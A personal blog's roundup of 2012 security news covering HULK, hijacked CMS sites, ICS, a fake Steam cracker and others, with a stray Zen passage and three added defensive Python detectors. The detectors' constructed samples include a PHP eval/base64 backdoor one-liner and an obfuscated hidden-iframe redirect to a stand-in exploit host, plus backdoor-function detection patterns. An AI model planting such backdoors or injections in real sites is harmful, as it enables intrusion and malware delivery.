NASA Investigates SSL Compromise

A NASA spokesperson told SecurityWeek they were investigating claims made by a group of Iranian hackers on May 16 that they had compromised the SSL certificate used on the NASA Solicitation and Proposal Integrated Review and Evaluation System (NSPIRES) Web site.

The Iranian student group of programmers and hackers known as the Cyber Warriors Team claimed to have compromised the SSL certificate by exploiting an existing vulnerability in the portal's log-in system. A certificate by itself is public data; whether the portal's private key was exposed is the question NASA's investigation would have to answer.

HULK DDoS Tool Smashes Web Servers

Researchers from Kaspersky Lab recently reported on a new distributed denial-of-service (DDoS) tool. The HTTP Unbearable Load King (HULK) tool differs from others of its kind in that it does not simply hit a server with a flood of TCP SYN packets or other predictable traffic.

Instead, HULK generates large numbers of unique HTTP requests designed to prevent server defenses from recognizing a pattern and filtering the attack traffic. HULK is the work of Barry Shteiman, a security professional who developed it out of frustration with the obvious patterns produced by other such tools.
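A defender's side of the point above, as an added example that is not code from HULK or from the Kaspersky report: a tool that never repeats a request still leaves a signature, namely a single source whose requests in a short window almost all carry a query string that was never seen before and whose User-Agent keeps changing. The script below parses combined-format access log lines and flags such sources. The thresholds, the log lines and the IP addresses are constructed assumptions for the demonstration.

```python
"""Flag HULK-style floods in a web server access log.

Added example for this post; it is not code from HULK itself or from the
Kaspersky report. The heuristic it applies is an assumption drawn from the
behaviour described above: a legitimate client repeats a handful of URLs
with one User-Agent, while a flood that avoids repeating itself sends many
requests in a short window, almost all with a never-before-seen query
string and with a changing User-Agent. Log lines are constructed.
"""
import random
import re
import string
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["url"], _, rec["query"] = rec["path"].partition("?")
    return rec


def find_hulk_sources(lines, window_s=10, min_requests=8, min_unique_ratio=0.8):
    """Return {ip: stats} for sources whose traffic looks like a HULK flood.

    A source is flagged when, inside some `window_s`-second sliding window,
    it sent at least `min_requests` requests, at least `min_unique_ratio` of
    them carried a query string distinct from the others in that window,
    and more than one User-Agent was used. The unique-query test is what
    catches a tool that deliberately never repeats a request; the
    User-Agent test keeps a crawler walking many distinct URLs from
    being flagged.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # Advance the window start until it spans at most window_s seconds.
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            window = recs[start:end + 1]
            if len(window) < min_requests:
                continue
            ratio = len({r["query"] for r in window}) / len(window)
            agents = {r["ua"] for r in window}
            if ratio >= min_unique_ratio and len(agents) > 1:
                flagged[ip] = {"requests": len(window),
                               "unique_query_ratio": round(ratio, 2),
                               "user_agents": len(agents)}
                break
    return flagged


# --- Constructed sample log (not real traffic) ---------------------------
_rng = random.Random(1)  # fixed seed so the sample is reproducible
_AGENTS = ["Mozilla/5.0 (Windows NT 6.1) Firefox/12.0",
           "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7) Safari/534.57",
           "Opera/9.80 (Windows NT 6.0) Presto/2.10.289 Version/12.00"]


def _token(n):
    return "".join(_rng.choice(string.ascii_letters) for _ in range(n))


def _line(ip, sec, path, ua, referer):
    return (f'{ip} - - [16/May/2012:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 512 "{referer}" "{ua}"')


SAMPLE_LOG = (
    # Flood: one request per second, fresh query string, rotating
    # User-Agent and random Referer on every request.
    [_line("203.0.113.7", i, f"/?{_token(8)}={i}{_token(10)}",
           _AGENTS[i % 3], f"http://{_token(6)}.example/") for i in range(12)]
    # Ordinary visitor: two URLs, no query string, one User-Agent.
    + [_line("198.51.100.5", 2 * i, ("/index.php", "/about.php")[i % 2],
             _AGENTS[0], "http://www.example.com/") for i in range(12)]
)

if __name__ == "__main__":
    for ip, stats in find_hulk_sources(SAMPLE_LOG).items():
        print(f"{ip}: {stats}")
```

The randomised query string, User-Agent and Referer mirror what HULK's own source does on every request; the window size and ratios are assumptions and would be tuned against a site's real traffic. The same per-source statistic is what a rate limiter keyed on the client address, rather than on the URL, would act on.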

Spammers Hijack Joomla and WordPress Sites

Security experts found many compromised WordPress and Joomla Web sites being used by spammers to advertise sketchy diet pills and counterfeit luxury goods. The owners of these sites are most likely unaware of what is going on.

Webmasters often fail to check their sites' subdirectories for signs of malicious files and Web pages, which lets cybercriminals use the domain's reputation to host their scams. Attackers often brute-force administrator passwords to gain access to a site's back end.
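The subdirectory check the paragraph above says webmasters skip, as an added example rather than a tool from any of the sources summarized here: it walks a web root and reports PHP inside upload directories, PHP that calls the functions backdoors use to hide their payload, and anything modified after a date on which the owner knows the site was clean. The directory names, the baseline date and the sample site it builds in a temporary directory are constructed assumptions.

```python
"""Find planted files in a CMS web root.

Added example for this post, not a tool from any of the sources summarized
here. It applies three checks matching how the spam pages described above
get planted: executable PHP inside directories that should only hold
uploads, PHP whose source uses the idioms backdoors rely on to hide
themselves, and anything modified after a baseline date on which the owner
knows the site was clean. The directory names, the baseline and the sample
site are constructed assumptions for the demonstration.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

# Directories that should never contain server-side code (assumed layout).
UPLOAD_DIRS = ("wp-content/uploads", "images", "media", "cache", "tmp")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")
# Functions almost every PHP backdoor calls; legitimate theme/plugin code
# rarely needs them, so a hit is worth a look rather than proof of compromise.
SUSPICIOUS = re.compile(
    rb"\b(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
# Assumed: the owner last made a legitimate change before 1 May 2012.
BASELINE = datetime(2012, 5, 1, tzinfo=timezone.utc).timestamp()


def scan_webroot(root, baseline_mtime=BASELINE):
    """Return sorted (relative_path, reason) pairs for files worth inspecting."""
    findings = []
    for dirpath, _, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for name in files:
            path = os.path.join(dirpath, name)
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            is_php = name.lower().endswith(PHP_EXT)
            if is_php and any(rel.startswith(d + "/") for d in UPLOAD_DIRS):
                findings.append((rel, "php in upload directory"))
            if is_php:
                with open(path, "rb") as fh:
                    if SUSPICIOUS.search(fh.read()):
                        findings.append((rel, "obfuscation/eval idiom"))
            if os.path.getmtime(path) > baseline_mtime:
                findings.append((rel, "modified after baseline"))
    return sorted(findings)


# --- Constructed sample site (not a real compromise) ---------------------
_CLEAN = {
    "index.php": b"<?php require 'wp-blog-header.php';\n",
    "wp-content/themes/twentyeleven/footer.php": b"<?php wp_footer(); ?>\n",
    "wp-content/uploads/2012/04/photo.jpg": b"\xff\xd8\xff\xe0 (not a real image)",
}
_PLANTED = {
    # Backdoor dropped into the uploads tree, named to look like housekeeping.
    "wp-content/uploads/2012/04/cache.php":
        b"<?php eval(base64_decode($_POST['p'])); ?>\n",
    # Spam landing page in a new subdirectory.
    "cheap-pills/index.html": b"<html><body>Buy discount pills</body></html>\n",
}


def build_sample_site():
    """Write the constructed site into a temp dir; clean files get an old mtime."""
    root = tempfile.mkdtemp(prefix="site-")
    for files, mtime in ((_CLEAN, BASELINE - 86400), (_PLANTED, BASELINE + 10 * 86400)):
        for rel, data in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
            os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    for rel, reason in scan_webroot(build_sample_site()):
        print(f"{reason:28} {rel}")
```

The modification-time check is the weakest of the three, since an attacker who already has shell access can reset timestamps; comparing file hashes against a clean copy of the CMS release is the stronger form of the same idea. Against the brute-forcing mentioned above, the corresponding control is on the login path itself: a per-source lockout on the admin login URL and passwords that are not in the dictionaries such tools use.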

DHS Questions Security of ICS

Operators of America's power, water, and manufacturing facilities use industrial control systems (ICS) to manage them. However, the security of these systems, increasingly linked with Microsoft Windows and the Internet, is now under intense scrutiny because of growing awareness that they could be attacked to cause massive disruptions.

Industrial facility operators are making efforts to follow security procedures, such as using vulnerability-assessment scanning tools to check for missing Windows patches. That said, ICS environments present special problems, said managers who spoke on the topic at a conference organized by DHS: a process that runs around the clock offers few windows in which to patch and reboot, and an ordinary network scan can knock over a fragile controller.

Chief Legal Officers and CIOs Must Work Together

A survey by Gartner and ALM found that chief legal officers (CLOs) need to engage enterprise CIOs more. Further, while CLOs say they regard CIOs as contributors to corporate strategy, they continue to lack a fundamental understanding of how to use technology in the enterprise or how to interact with their IT departments.

"The survey results showed that communication is the key variable in the success or lack of success of the CLO/IT relationship," said French Caldwell, vice president and Gartner fellow. "When CLOs have substantive conversations with CIOs more than once a month, CLO satisfaction with IT is higher."

Rinzai Zen - Fujaku, Fugu


Samsara is the same as nirvana, defilement the same as purity, and delusion the same as enlightenment. The challenge to understanding is due to one's ignorance -- the ignorance in mistaking phenomena for ultimate reality. Great is Mind. Heaven's height is immeasurable, but Mind goes beyond heaven; the earth's depth is also unfathomable, but Mind reaches below the earth.

Study Zen -- one discovers the key to all forms of Buddhism.
Practice Zen -- one's life is brought to fulfillment in the attainment of enlightenment.

"Where should your mind be kept?  If your mind is not fixed anywhere it will pervade throughout the body... If your mind is fixed on a certain spot, it will be seized by that spot, and no activities can be performed efficiently. Not to fix your mind anywhere is essential. Not fixed anywhere, the mind is everywhere." 

Hacking Governments With Hijacked Sites

Malicious code planted within compromised Web pages has become the latest method for attackers targeting government organizations, according to research from security firm Zscaler, V3.co.uk reported April 21. The firm discovered many government-affiliated Web sites carrying code that redirects visitors to attack servers.

The most recent site to be infected was that of the French budget minister. It was found to contain obfuscated JavaScript that sends the visitor to a third-party site, which then attempts to exploit vulnerabilities on the visitor's machine and install malware. The attack is the latest in what Zscaler sees as a string of site hijackings aimed at government-controlled domains.
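What such an injection looks like from the inspecting side, as an added example that is neither Zscaler's detection logic nor the code found on the site above: the script scans a page's HTML for scripts that hide their payload behind unescape(), String.fromCharCode() or eval() and emit it with document.write(), and for zero-size or hidden iframes pointing off-site, decoding the obfuscated payload so the third-party host the visitor would be sent to is reported. The sample page, its host name and the attack hosts are constructed.

```python
"""Spot injected, obfuscated redirect scripts in a fetched page.

Added example for this post; not Zscaler's detection logic and not the
code found on the site described above. It scans the HTML of a page for
the two shapes such injections usually take: a script that hides its
payload behind unescape()/String.fromCharCode()/eval() and writes it with
document.write(), and a zero-size or hidden <iframe> pulling from a host
other than the page's own. Obfuscated payloads are decoded so the
third-party URL the visitor would be sent to is reported. The sample page,
its host name and the attack hosts are constructed.
"""
import re
from urllib.parse import unquote, urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"""(width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)
OBF_MARKERS = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
# Eight or more consecutive %XX / \xXX escapes: a string built to hide its text.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}){8,}")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


def decode_layers(text, max_layers=3):
    """Undo percent-, backslash-x- and fromCharCode-encoding until the text stops changing."""
    for _ in range(max_layers):
        new = unquote(text)
        new = re.sub(r"\\x([0-9a-fA-F]{2})",
                     lambda m: chr(int(m.group(1), 16)), new)
        new = re.sub(r"String\.fromCharCode\(([\d,\s]+)\)",
                     lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
                     new)
        if new == text:
            break
        text = new
    return text


def external_urls(text, page_host):
    """URLs in `text` whose host is not the page's own."""
    return sorted({u for u in URL_RE.findall(text)
                   if urlparse(u).hostname != page_host})


def analyze_page(html_text, page_host):
    """Return a list of (finding, [external urls]) for a page's HTML."""
    findings = []
    for tag in IFRAME_RE.findall(html_text):
        if HIDDEN_RE.search(tag):
            findings.append(("hidden iframe", external_urls(tag, page_host)))
    for body in SCRIPT_RE.findall(html_text):
        if not (OBF_MARKERS.search(body) or ESCAPE_RUN.search(body)):
            continue
        decoded = decode_layers(body)
        writes_hidden = any(HIDDEN_RE.search(t) for t in IFRAME_RE.findall(decoded))
        label = "obfuscated script" + (" writing hidden iframe" if writes_hidden else "")
        findings.append((label, external_urls(decoded, page_host)))
    return findings


# --- Constructed page: a legitimate site body with two injections --------
SAMPLE_HOST = "budget.example.org"
SAMPLE_PAGE = """<html><head>
<script src="/js/jquery.js"></script>
<script>var page = "budget"; trackView(page);</script>
</head><body>
<iframe src="http://video.example.org/embed/1" width="480" height="320"></iframe>
<!-- injection 1: percent-encoded zero-size iframe written at load time -->
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example.net%2Fin.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E"))</script>
<!-- injection 2: hidden iframe pasted straight into the markup -->
<iframe src="http://203.0.113.44/count.php" style="visibility:hidden;width:1px;height:1px"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding, urls in analyze_page(SAMPLE_PAGE, SAMPLE_HOST):
        print(f"{finding}: {', '.join(urls) or '(no external url)'}")
```

The marker list is a heuristic: legitimate analytics and ad code also calls document.write(), so a hit is a reason to read the decoded script, not a verdict. The decoded external URL is what an analyst hands to the blocklist and to whoever owns the compromised site.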

Social Engineers Target Utilities

The United States Computer Emergency Readiness Team (US-CERT) recently warned that cyber criminals are attempting highly targeted social engineering attacks on operators of industrial control systems (ICS), which are common in utility firms. The attacks take the form of phishing phone calls purportedly from the "Microsoft Server Department" warning of infected PCs. The caller attempts to get the utility to turn on services that would allow unauthorized remote access.

HINT: Microsoft is not going to call you unless you specifically requested a call. (See also US Utilities Under Daily Cyber-attack.)

Steam Cracker Steals User Credentials

Users of Valve's Steam game sales and distribution platform are being targeted by malware peddlers; the lure is a "Steam Cracker," offered on YouTube and on many gamer forums, which supposedly gives users access to all games for free.

The scammers offer simple instructions for installing the software: disable antivirus software and firewall, then replace the original steam.exe file with the downloaded, cracked one. "The file in question is a fake Steam client, which uses aspects of the real thing but just falls short of being 100 percent convincing (file size, file, and of course the fact that this file isn’t digitally signed unlike the real Steam executable)," a GFI researcher said.

If the user runs Windows Vista or a later version of the platform, the file executes and displays the fake client, which looks legitimate.

Information

Pragmatic Journey is Richard (rich) Wermske's life of recovery; a spiritual journey inspired by Buddhism, a career in technology and management with linux, digital security, bpm, and paralegal stuff; augmented with gaming, literature, philosophy, art and music; and compassionate kinship with all things living -- especially cats; and people with whom I share no common language.